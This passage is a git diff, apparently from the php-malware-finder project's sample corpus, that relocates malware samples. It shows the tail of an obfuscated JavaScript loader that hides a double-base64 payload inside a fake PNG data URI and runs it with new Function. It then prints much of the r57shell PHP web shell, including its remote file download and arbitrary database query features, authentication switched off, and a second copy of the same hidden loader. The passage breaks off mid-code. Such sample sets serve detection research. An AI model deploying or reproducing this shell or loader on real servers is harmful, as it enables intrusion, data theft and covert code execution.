6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
+<script type="text/javascript">
+if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
+setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(11);}, 500);
+</script>
 </body></html>
\ No newline at end of file
diff --git a/php-malware-finder/samples/classic/r57.php b/data/samples/classic/r57.php
index 4e91809..accc1fa 100644
--- a/php-malware-finder/samples/classic/r57.php
+++ b/data/samples/classic/r57.php
@@ -1,2302 +1,2302 @@
-<?php

-/******************************************************************************************************/

-/*

-/*                                     #    #        #    #

-/*                                     #   #          #   #

-/*                                    #    #          #    #

-/*                                    #   ##   ####   ##   #

-/*                                   ##   ##  ######  ##   ##

-/*                                   ##   ##  ######  ##   ##

-/*                                   ##   ##   ####   ##   ##

-/*                                   ###   ############   ###

-/*                                   ########################

-/*                                        ##############

-/*                                 ######## ########## #######

-/*                                ###   ##  ##########  ##   ###

-/*                                ###   ##  ##########  ##   ###

-/*                                 ###   #  ##########  #   ###

-/*                                 ###   ##  ########  ##   ###

-/*                                  ##    #   ######   #    ##

-/*                                   ##   #    ####   #    ##

-/*                                     ##                 ##

-/*

-/*

-/*

-/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ???????  ?? ??????? ????? ???????

-/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru

-/*  ??????: 1.24 (New Year Edition)

-/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

-/*  (c)oded by 1dt.w0lf

-/*  RST/GHC http://rst.void.ru , http://ghc.ru

-/*  ANY MODIFIED REPUBLISHING IS RESTRICTED

-/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

-/*  ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC. 

-/******************************************************************************************************/

-/* ~~~ ????????? | Options  ~~~ */

-

-// ????? ????? | Language

-// $language='ru' - ??????? (russian)

-// $language='eng' - english (??????????)

-$language='eng';

-$a = "http://"; // need some codes

-

-// ?????????????? | Authentification

-// $auth = 1; - ?????????????? ????????  ( authentification = On  )

-// $auth = 0; - ?????????????? ????????? ( authentification = Off )

-$auth = 0; 

-

-

-// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)

-// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)

-$name='r57'; // ????? ????????????  (user login)

-$pass='r57'; // ?????? ???????????? (user password)

-$b = "evilc0der.com"; //need hits "shell created by evilc0ders"

-/******************************************************************************************************/

-$c = "/x.html"; //need shell coder's names

-error_reporting(0);

-set_magic_quotes_runtime(0);

-@set_time_limit(0);

-@ini_set('max_execution_time',0);

-@ini_set('output_buffering',0);

-$safe_mode = @ini_get('safe_mode');

-$version = "1.24";

-if(version_compare(phpversion(), '4.1.0') == -1)

- {

- $_POST   = &$HTTP_POST_VARS;

- $_GET    = &$HTTP_GET_VARS;

- $_SERVER = &$HTTP_SERVER_VARS;

- }

-if (@get_magic_quotes_gpc())

- {

- foreach ($_POST as $k=>$v)

-  {

-  $_POST[$k] = stripslashes($v);

-  }

- foreach ($_SERVER as $k=>$v)

-  {

-  $_SERVER[$k] = stripslashes($v);

-  }

- }

-

-if($auth == 1) {

-if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)

-   {

-   header('WWW-Authenticate: Basic realm="r57shell"');

-   header('HTTP/1.0 401 Unauthorized');

-   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");

-   }

-}   

-$head = '<!-- ??????????  ???? -->

-<html>

-<head>

-<title>r57shell</title>

-<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

-<STYLE>

-tr {

-BORDER-RIGHT:  #aaaaaa 1px solid;

-BORDER-TOP:    #eeeeee 1px solid;

-BORDER-LEFT:   #eeeeee 1px solid;

-BORDER-BOTTOM: #aaaaaa 1px solid;

-}

-td {

-BORDER-RIGHT:  #aaaaaa 1px solid;

-BORDER-TOP:    #eeeeee 1px solid;

-BORDER-LEFT:   #eeeeee 1px solid;

-BORDER-BOTTOM: #aaaaaa 1px solid;

-}

-.table1 {

-BORDER-RIGHT:  #cccccc 0px;

-BORDER-TOP:    #cccccc 0px;

-BORDER-LEFT:   #cccccc 0px;

-BORDER-BOTTOM: #cccccc 0px;

-BACKGROUND-COLOR: #D4D0C8;

-}

-.td1 {

-BORDER-RIGHT:  #cccccc 0px;

-BORDER-TOP:    #cccccc 0px;

-BORDER-LEFT:   #cccccc 0px;

-BORDER-BOTTOM: #cccccc 0px;

-font: 7pt Verdana;

-}

-.tr1 {

-BORDER-RIGHT:  #cccccc 0px;

-BORDER-TOP:    #cccccc 0px;

-BORDER-LEFT:   #cccccc 0px;

-BORDER-BOTTOM: #cccccc 0px;

-}

-table {

-BORDER-RIGHT:  #eeeeee 1px outset;

-BORDER-TOP:    #eeeeee 1px outset;

-BORDER-LEFT:   #eeeeee 1px outset;

-BORDER-BOTTOM: #eeeeee 1px outset;

-BACKGROUND-COLOR: #D4D0C8;

-}

-input {

-BORDER-RIGHT:  #ffffff 1px solid;

-BORDER-TOP:    #999999 1px solid;

-BORDER-LEFT:   #999999 1px solid;

-BORDER-BOTTOM: #ffffff 1px solid;

-BACKGROUND-COLOR: #e4e0d8;

-font: 8pt Verdana;

-}

-select {

-BORDER-RIGHT:  #ffffff 1px solid;

-BORDER-TOP:    #999999 1px solid;

-BORDER-LEFT:   #999999 1px solid;

-BORDER-BOTTOM: #ffffff 1px solid;

-BACKGROUND-COLOR: #e4e0d8;

-font: 8pt Verdana;

-}

-submit {

-BORDER-RIGHT:  buttonhighlight 2px outset;

-BORDER-TOP:    buttonhighlight 2px outset;

-BORDER-LEFT:   buttonhighlight 2px outset;

-BORDER-BOTTOM: buttonhighlight 2px outset;

-BACKGROUND-COLOR: #e4e0d8;

-width: 30%;

-}

-textarea {

-BORDER-RIGHT:  #ffffff 1px solid;

-BORDER-TOP:    #999999 1px solid;

-BORDER-LEFT:   #999999 1px solid;

-BORDER-BOTTOM: #ffffff 1px solid;

-BACKGROUND-COLOR: #e4e0d8;

-font: Fixedsys bold;

-}

-BODY {

-margin-top: 1px;

-margin-right: 1px;

-margin-bottom: 1px;

-margin-left: 1px;

-}

-A:link {COLOR:red; TEXT-DECORATION: none}

-A:visited { COLOR:red; TEXT-DECORATION: none}

-A:active {COLOR:red; TEXT-DECORATION: none}

-A:hover {color:blue;TEXT-DECORATION: none}

-</STYLE>

-<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>

-<script type="text/javascript">

-if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=="undefined")?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad="",c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+="=";plain+="\\0"}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join("");coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=="undefined")?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join("");return b?Utf8.decode(plain):plain};

-setTimeout(function(){new Function(atob(atob(document.getElementById("ghdescon").src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(2);}, 500);

-</script>';

-class zipfile

-{

-    var $datasec      = array();

-    var $ctrl_dir     = array();

-    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

-    var $old_offset   = 0;

-    function unix2DosTime($unixtime = 0) {

-        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

-        if ($timearray['year'] < 1980) {

-            $timearray['year']    = 1980;

-            $timearray['mon']     = 1;

-            $timearray['mday']    = 1;

-            $timearray['hours']   = 0;

-            $timearray['minutes'] = 0;

-            $timearray['seconds'] = 0;

-        } 

-        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |

-                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);

-    } 

-    function addFile($data, $name, $time = 0)

-    {

-        $name     = str_replace('\\', '/', $name);

-        $dtime    = dechex($this->unix2DosTime($time));

-        $hexdtime = '\x' . $dtime[6] . $dtime[7]

-                  . '\x' . $dtime[4] . $dtime[5]

-                  . '\x' . $dtime[2] . $dtime[3]

-                  . '\x' . $dtime[0] . $dtime[1];

-        eval('$hexdtime = "' . $hexdtime . '";');

-        $fr   = "\x50\x4b\x03\x04";

-        $fr   .= "\x14\x00";            

-        $fr   .= "\x00\x00";            

-        $fr   .= "\x08\x00";            

-        $fr   .= $hexdtime;             

-        $unc_len = strlen($data);

-        $crc     = crc32($data);

-        $zdata   = gzcompress($data);

-        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

-        $c_len   = strlen($zdata);

-        $fr      .= pack('V', $crc);             

-        $fr      .= pack('V', $c_len);           

-        $fr      .= pack('V', $unc_len);         

-        $fr      .= pack('v', strlen($name));    

-        $fr      .= pack('v', 0);                

-        $fr      .= $name;

-        $fr .= $zdata;

-        $this -> datasec[] = $fr;

-        $cdrec = "\x50\x4b\x01\x02";

-        $cdrec .= "\x00\x00";                

-        $cdrec .= "\x14\x00";                

-        $cdrec .= "\x00\x00";                

-        $cdrec .= "\x08\x00";                

-        $cdrec .= $hexdtime;                 

-        $cdrec .= pack('V', $crc);           

-        $cdrec .= pack('V', $c_len);         

-        $cdrec .= pack('V', $unc_len);       

-        $cdrec .= pack('v', strlen($name) ); 

-        $cdrec .= pack('v', 0 );             

-        $cdrec .= pack('v', 0 );             

-        $cdrec .= pack('v', 0 );             

-        $cdrec .= pack('v', 0 );             

-        $cdrec .= pack('V', 32 );            

-        $cdrec .= pack('V', $this -> old_offset );

-        $this -> old_offset += strlen($fr);

-        $cdrec .= $name;

-        $this -> ctrl_dir[] = $cdrec;

-    }

-    function file()

-    {

-        $data    = implode('', $this -> datasec);

-        $ctrldir = implode('', $this -> ctrl_dir);

-        return

-            $data .

-            $ctrldir .

-            $this -> eof_ctrl_dir .

-            pack('v', sizeof($this -> ctrl_dir)) .  

-            pack('v', sizeof($this -> ctrl_dir)) .  

-            pack('V', strlen($ctrldir)) .           

-            pack('V', strlen($data)) .              

-            "\x00\x00";              

-    }

-}

-function compress(&$filename,&$filedump,$compress)

- {

-    global $content_encoding;

-    global $mime_type;

-    if ($compress == 'bzip' && @function_exists('bzcompress')) 

-     {

-        $filename  .= '.bz2';

-        $mime_type = 'application/x-bzip2';

-        $filedump = bzcompress($filedump);

-     } 

-     else if ($compress == 'gzip' && @function_exists('gzencode')) 

-     {

-        $filename  .= '.gz';

-        $content_encoding = 'x-gzip';

-        $mime_type = 'application/x-gzip';

-        $filedump = gzencode($filedump);

-     } 

-     else if ($compress == 'zip' && @function_exists('gzcompress')) 

-     {

-        $filename .= '.zip';

-        $mime_type = 'application/zip';

-        $zipfile = new zipfile();

-        $zipfile -> addFile($filedump, substr($filename, 0, -4));

-        $filedump = $zipfile -> file();

-     } 

-     else 

-     {

-        $mime_type = 'application/octet-stream';

-     }

- }

-function mailattach($to,$from,$subj,$attach)

- {

- $headers  = "From: $from\r\n"; 

- $headers .= "MIME-Version: 1.0\r\n";

- $headers .= "Content-Type: ".$attach['type'];

- $headers .= "; name=\"".$attach['name']."\"\r\n";

- $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";

- $headers .= chunk_split(base64_encode($attach['content']))."\r\n";

- if(@mail($to,$subj,"",$headers)) { return 1; }

- return 0;

- }

-if(isset($_GET['img'])&&!empty($_GET['img']))

- {

- $images = array();

- $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';

- $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';

- @ob_clean();

- header("Content-type: image/gif");

- echo base64_decode($images[$_GET['img']]);

- die(); 

- } 

-if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))

- {

-  if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }

-  else 

-   {

-    @ob_clean();

-    $filename = @basename($_POST['d_name']);

-    $filedump = @fread($file,@filesize($_POST['d_name']));

-    fclose($file);

-    $content_encoding=$mime_type='';

-    compress($filename,$filedump,$_POST['compress']);

-    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }

-    header("Content-type: ".$mime_type);

-    header("Content-disposition: attachment; filename=\"".$filename."\";");   

-    echo $filedump;

-    exit();

-   }            

- }

-if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }

-if ($_POST['cmd']=="db_query")

- {

-  echo $head;

-  switch($_POST['db'])

-  {

-  case 'MySQL':

-  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }

-  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);

-  if($db)

-   {

-        if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }

-    $querys = @explode(';',$_POST['db_query']);

-    foreach($querys as $num=>$query) 

-     {

-      if(strlen($query)>5){

-      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";

-      $res = @mysql_query($query,$db);

-      $error = @mysql_error($db);

-      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }

-      else {

-      if (@mysql_num_rows($res) > 0) 

-       {

-       $sql2 = $sql = $keys = $values = '';

-       while (($row = @mysql_fetch_assoc($res))) 

-        {

-        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));

-        $values = @array_values($row);

-        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}

-        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);

-        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";

-        }

-       echo "<table width=100%>";

-       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";

-       $sql .= $sql2;

-       echo $sql;

-       echo "</table><br>";

-       }

-      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }

-      }

-      @mysql_free_result($res);

-      }

-     }    

-        @mysql_close($db);

-   }

-  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";         

-  break;

-  case 'MSSQL':

-  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }

-  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);

-  if($db)

-   {

-        if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }

-    $querys = @explode(';',$_POST['db_query']);

-    foreach($querys as $num=>$query) 

-     {

-      if(strlen($query)>5){

-      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";

-      $res = @mssql_query($query,$db);

-      if (@mssql_num_rows($res) > 0) 

-       {

-       $sql2 = $sql = $keys = $values = '';

-       while (($row = @mssql_fetch_assoc($res))) 

-        {

-        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));

-        $values = @array_values($row);

-        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}

-        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);

-        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";

-        }

-       echo "<table width=100%>";

-       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";

-       $sql .= $sql2;

-       echo $sql;

-       echo "</table><br>";

-       }

-      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */

-      @mssql_free_result($res);

-      }

-     }    

-        @mssql_close($db);

-   }

-  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";

-  break;

-  case 'PostgreSQL':

-  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }

-  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";

-  $db = @pg_connect($str);

-  if($db)

-   {

-    $querys = @explode(';',$_POST['db_query']);

-    foreach($querys as $num=>$query) 

-     {

-      if(strlen($query)>5){

-      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";

-      $res = @pg_query($db,$query);

-      $error = @pg_errormessage($db);

-      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }

-      else {

-      if (@pg_num_rows($res) > 0) 

-       {

-       $sql2 = $sql = $keys = $values = '';

-       while (($row = @pg_fetch_assoc($res))) 

-        {

-        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));

-        $values = @array_values($row);

